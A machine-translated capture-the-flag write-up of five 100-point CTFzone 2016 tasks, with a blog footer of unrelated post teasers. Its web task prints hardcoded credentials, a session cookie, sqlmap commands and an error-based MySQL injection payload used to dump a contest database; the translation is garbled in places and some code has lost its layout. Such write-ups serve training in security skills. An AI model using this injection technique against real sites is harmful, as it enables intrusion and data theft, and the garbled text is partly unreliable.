[ZeroNights2016] [CTFzone] Without 100 gram you will not understand



We continue the series of articles devoted to ritau for CTFzone, which took place on 17 and 18 November in the framework of ZeroNights2016 under the flag of Bi.Zone. This time we will talk about the job that had 100 points in favor of real hackers!

Previous publications from this series
1) Debriefing over 50

Special thanks to GH0st3rs for providing rateapy certain tasks.

FORENSIC100 — Master of Strings

Rise and shine, Lieutenant, stop dreaming of drinking vodka and playing with the bear. A. U. R. O. R. A. is speaking and it's time you stopped sleeping at your workplace. You can't idle your time anymore as the whole world might go down the drain unless, well... Let's say it's time you are back in the game. The right man in the wrong place can change the world. So wake up, Lieutenant, find a password for the Spaceship panel and join the forces on Earth!

The task was attached 7z archive file '.RAM' inside. Logically, it is necessary to analyze the cast of RAM. It was decided to look in the direction of 'Volatility'. Again (two/three) after reading the task and scrolling through the Wiki on Volatility, you could see the section "Strings" and see link to SysInternals Strings. Of course, it we use:

the 
strings.exe task_forensic_100.ram > output

The resulting output at ~70MB of UNICODE strings longer than 3 characters (by default). Opening it with a text editor, I went in search of the flag — "what if?". Imagine my surprise:


As it turned out: my receipt of the flag was not the way it was planned "author". Well, that may be even better.

MISC100 — Nerdy Mechanic

A. U. R. O. R. A.: Lieutenant, let me introduce you to Sergeant Varvara. She needs your help.
Varvara Sergeant: Lieutenant, this terminal is not working. I entered my request but there is some gibberish on the screen. Our air was the last mechanic to work on this terminal. Would you take a look?

Below, we provide the same "curve" the output from the terminal:

the 
why
ir-iagp
irbie -t
cifap
iw;-pfqlfrg -sfm DFG gukjlpi.cym/dnwalwbw
pfrfg

What to do with it? Let's look closer: the end of the fifth line is very similar to the link. However, you need to replace: 'y' -> 'o'. Then the first line of the 'why' turns into 'who' — yeah! — obviously this is the Bash shell. Maybe this job was a kind of logic of substitution of letters, however, sketched a simple script in Python by trial, the solution came by itself:

the 
print(text.replace('y','o').replace('j','y').replace('n','j').replace('k','n').replace('u','v').replace('l','u').replace('i','l').replace('r','s').replace('e','k').replace('f','e').replace('p','r').replace('g','t').replace('G','T').replace(';','p').replace('d','g').replace('D','G').replace('F','E').replace('v','i'))

The result was the following:

the 
who 
ls-latr 
lsblk -t 
clear 
lwp-request-sem GET tinyurl.com/gjwauwbw 
reset

Go to the link and see the flag: ctfzone{182ac24a3b2dc86ba298f57d9c391c0b}

PS > From sources it became known that the original replacement algorithm of letters in this ciphertext — use Colemak.

WEB100 — Search Engine

Lieutenant (You): A. U. R. O. R. A., I'm in the SNT-47 compartment, in the general-purpose room. Thermal signatures are missing. I need to find a way to connect to the communications ship and it's urgent, what should I do?
A. U. R. O. R. A.: Welcome to the information retrieval system A. U. R. O. R. A. Please name your identification number.
You: What identification number?! Are you broken as well?? Let's see what you have inside if I don't want to stay here forever...

The task included a link to a website with a login form:



Where to start? Right: search the source code of the page. Go there and observe the following:

the 
<script src=/static/js/pewpew.js type="text/javascript"></script>

Open look:

the 

if ('s3cr3tuser' === $(ctrls[0]).find('input').val()
&& 'v3rySTr0ngP@ss' === $(ctrls[1]).find('input').val()) {

To the naked eye, we understand what it is. Return authorization form and move on. We have a page with a single search string. "Not a SQLi here an hour?", — must be heard in the head. Go check out: bingo!

Well, uncovering the good old SqlMap (of course, you can hands). Don't forget that we produced authorization => you need to specify Cookies. In order to save local space output is not complete:

the 
root@hackzard:~# sqlmap -u "http://78.155.219.6/search/param1*" --cookie="session=eyJ1c2VybmFtZSI6InMzY3IzdHVzZXJzzkhxekrtd09wsvlqr0oifq.Cw6t3A.obdrULM4zqHM6FlQcQh_uaPtgmg" --level=3 --dbms=MySQL --tables

Output commands
Parameter: #1* (URI)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://78.155.219.6:80/search/param1'||(SELECT 'bGEm' FROM DUAL WHERE 8985=8985 AND (SELECT 1912 FROM(SELECT COUNT(*),CONCAT(0x7170716a71,(SELECT (ELT(1912=1912,1))),0x7176717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
---
[18:30:29] [INFO] testing MySQL
[18:30:29] [INFO] confirming MySQL
[18:30:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL > = 5.0.0
[18:30:29] [INFO] fetching database names
[18:30:29] [INFO] the SQL query used returns 5 entries
[18:30:29] [INFO] resumed: information_schema
[18:30:29] [INFO] resumed: mysql
[18:30:29] [INFO] resumed: performance_schema
[18:30:29] [INFO] resumed: sqli_100
[18:30:29] [INFO] resumed: sys
[18:30:29] [INFO] fetching tables for databases: 'information_schema, mysql, performance_schema, sqli_100, sys'
[18:30:29] [INFO] the SQL query used returns 282 entries

the 
root@hackzard:~# sqlmap -u "http://78.155.219.6/search/param1*" --cookie="session=eyJ1c2VybmFtZSI6InMzY3IzdHVzZXJzzkhxekrtd09wsvlqr0oifq.Cw6t3A.obdrULM4zqHM6FlQcQh_uaPtgmg" --level=3 --dbms=MySQL -D "sqli_100" -T "wtf3thisiss3crettable_dont_read_dont_touch" --columns

Output commands
Database: sqli_100
Table: wtf3thisiss3crettable_dont_read_dont_touch
[2 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| id | int(5) |
| secret | varchar(500) |
+--------+--------------+

the 
root@hackzard:~# sqlmap -u "http://78.155.219.6/search/param1*" --cookie="session=eyJ1c2VybmFtZSI6InMzY3IzdHVzZXJzzkhxekrtd09wsvlqr0oifq.Cw6t3A.obdrULM4zqHM6FlQcQh_uaPtgmg" --level=3 --dbms=MySQL -D "sqli_100" -T "wtf3thisiss3crettable_dont_read_dont_touch" -C "secret" --dump

Output commands
Database: sqli_100
Table: wtf3thisiss3crettable_dont_read_dont_touch
[13 entries]
+-----------------------------------------+
| secret |
+-----------------------------------------+
| 089b1d5d37c22d81b55b6f77c9e2b042 |
| asdkkjhjsdaojewifdiowuefdw0 |
| asdkkjhjsdaojewifdiowuefdw0 |
| dskjhwjkfhsjdkfhsjdkhfjk |
| dskjhwjkfhsjdkfhsjdkhfjk |
| dskjhwjkfhsjdkfhsjdkhfjk |
| dskjhwjkfhsjdkfhsjdkhfjk |
| lfhdwrekfgbuhwoeijfdweoifjweoif |
| lfhdwrekfgbuhwoeijfdweoifjweoif |
| lfhdwrekfgbuhwoeijfdweoifjweoif |
| lfhdwrekfgbuhwoeijfdweoifjweoif |
| REMEMBER_FLAG_FORMAT.FLAG_IN_THIS_TABLE |
| REMEMBER_FLAG_FORMAT.FLAG_IN_THIS_TABLE |
+-----------------------------------------+

We are asked not to forget the format of the flag, because it is in this table. Here it is:

ctfzone{089b1d5d37c22d81b55b6f77c9e2b042}

OSINT100 — Weird Guy

A. U. R. O. R. A.: Lieutenant, our agents sneaked in Cosmos hotel and witnessed the preparations for ZERONIGHTS 2016. Everyone was busy installing their stands and making photos. There was a weird guy in the hall who was absorbed in reading something on his laptop. We couldn't figure out who was this guy but we need to know what he was looking at the screen. This photo might help you.

The task was attached to the picture:


In the photo we can see how silpada a man photographs the other, and also notice that the screen falls into the field of photography. The challenge is clear: we need to find a photo with the correct angle. Given that the CTF has an international character wonder: "What website do we need?" That's Right — Instagram. Further, this problem would have two solutions:

the
    the
  • Realizing that photography was within the ZeroNights2016 on site GK "Cosmos" — to use search by store location. Unfortunately, the moment refused to work, due to the uncertain change in the Instagram API;
    • the
  • by trial and error to sort out all #hashtags somehow related to CTF, Bi.Zone or ZeroNights in General.

After some time (using the second method) the required hashtag was found: #zn2016. And here's the required photo:



Flag: ctfzone{Os1nT_G4nGsT3r}

REVERSE100 — The Doors Of Dorun

**A. U. R. O. R. A.: ** Lieutenant, your co-pilot was abducted by aliens and put into prison. They are out hunting now and it's your chance to set him free! He is held behind the Doors, the jambs invisible to the eye, and matched so perfectly with the metal bulkhead that when closed the Doors could not be seen.
The inscription on the archivolt read:
"The Doors of Dorun, Lord of Omega. Speak, friend, and enter. I, Norvy, made them. Calabrimbor of Alpha Centauri drew these signs".
But be careful and hurry up. They can be back any moment.

The job came with a file to run that has a window with a field for a password. If the password is incorrect, then the followed error:

Well, okay, I'll turn inside out! Disassemble and re-see the familiar from a previous engagement (REVERSE50), function: DialogFunc, offset: 13F7C1040. Look further and find:


In this code fragment retrieves the entered password, then pass it to a function (let's call it: PassVerify), and in the case of an incorrect result

jz short loc_13F7C1126

takes us on a piece of code that signal an error:


Go to the function: PassVerify and see what was going on. See the test length, we introduced phrase – 4 characters.


Then, the password is split into 2 parts in 2 characters:


Then starts filling the stack with values for verification. And, since addresses: 13F7C1330, she begins checking the entered password:


Use the HexRays plugin and get the code like this:


So, what do we have? In "v3" is the first part of the password, and the "v5" is the second. If you convert this cycle, we'll get such a condition (Python):

the 
v8 = [0, 0, 1, 241, 995, 0, 1, 4, 6, 104, 413, 0]
if (v3%3==v8[0] and v3%5==v8[1] and v3%17==v8[2] and v3%257==v8[3] and v3%65537==v8[4]) or (v5%3==v8[6] and v5%5==v8[7] and v5%17==v8[8] and v5%257==v8[9] and v5%65537==v8[10])

The solution to this equation, each chose for themselves. However, we are not looking for the easy way and use the Chinese remainder theorem (the script of which remain from NeoQuest2016):

Chinese remainder theorem. Implementation: Python
def chinese_remainder(n, a):
sum = 0
prod = reduce(lambda a, b: a*b, n)

for n_i, a_i in zip(n, a):
p = prod / n_i
sum += a_i * mul_inv(p, n_i) * p
return sum % prod


def mul_inv(a, b):
b0 = b
x0, x1 = 0, 1
if b == 1:  return  1
while a > 1:
q = a / b
a, b = b, a%b
x0, x1 = x1 - q * x0, x0
if x1 < 0: x1 += b0
return x1


Use:

the 
hex(chinese_remainder([3,5,17,257,65537],[v8[0],v8[1],v8[2],v8[3],v8[4]]))

Conclusion: 0xa028a40b

Use:

the 
hex(chinese_remainder([3,5,17,257,65537],[v8[6],v8[7],v8[8],v8[9],v8[10]]))

Conclusion: 0xa288a425

We received character codes. The next step will be the visit this website and search for the relevant symbols according to the known HEX values. Received: ꐋꀨꐥꊈ. Try this password — Profit!




We will continue this series of articles, where we will consider the solution of other tasks of CTFzone 2016.
Stay tuned!
Article based on information from habrahabr.ru

Комментарии

Отправить комментарий

Популярные сообщения из этого блога

Integration of PostgreSQL with MS SQL Server for those who want faster and deeper

Изображение
Recently habré was already published integration PostgreSQL and MSSQL. But, items there is categorically not enough. Therefore, the objectives of this publication are the following: the the to broaden and deepen publicly available information about FDW for MSSQL-called tds_fdw to tell the difference in major versions and describe basic compatibility issues; the to talk about the possibilities of optimization of queries that use the foreign table; the to address the subject of caching external data in a materialized view; the to say a few words about the exotic ways to integrate PostgreSQL and MSSQL. the Installing and configuring TDS FDW The guys from PostgresPro already sufficiently said about this process, I will not repeat. Will leave a few links to the official PostgreSQL documentation and examples from tds_fdw: the the creating an extension (extension) in PG: off.dokumentacija ; the server: off.documentation , example of tds_fdw ; the creating ...
Далее...

Custom database queries in MODx Revolution

This topic will certainly be useful for those who have quite a lot of projects on MODx Revolution, as with the usual sites of business cards is enough and the standard working methods of a La $modx- > getObject() , $modx->getCollection() , etc., and these methods are inherently not just a job database, but also with the objects of MODx. When working with large projects methods a La $modx- > getCollection() for us is not the best solution for two reasons: 1. The overexpenditures. These methods are not just getting data from DB, but also create instance of the retrieved objects. In this case, getting information about 10000 documents, we get 10000 objects of modResource that it is not very cool. 2. The task is complicated by the count of records. In addition to the direct difficulties of counting even at the query level, even if you get 10 records of the same document (for example), MODx will return as a result only one object modResource. Although often that will su...
Далее...

2 years Kartavykh reviews — the story of an Amateur show Old-Hard

Изображение
“Some say we're never meant to grow up...” (Sum 41, “Some Say”) Today my little, regularly coming out Tobolskiy about old computer games and hardware is two years old. Time for an Amateur show a lot of... it's time to do a little retrospective, to dismantle "(not)a creative way". Interested? Welcome to under the cut! the What show? First, there were numerous conversations with a friend on the topic "and it would be nice to own its video transmission..." (immediately after their own MMOPRG and the Board game of course!). These conversations between the business or there for a beer lasted for months and were not specific plans — rather a discussion on "would be nice". But at some point my mind just clicked thought "what the hell?!", and just a couple of hours "on the knee" and single-handedly made the first release. After receiving certain feedback, among whom were cautiously positive, and "the idea is good, th...
Далее...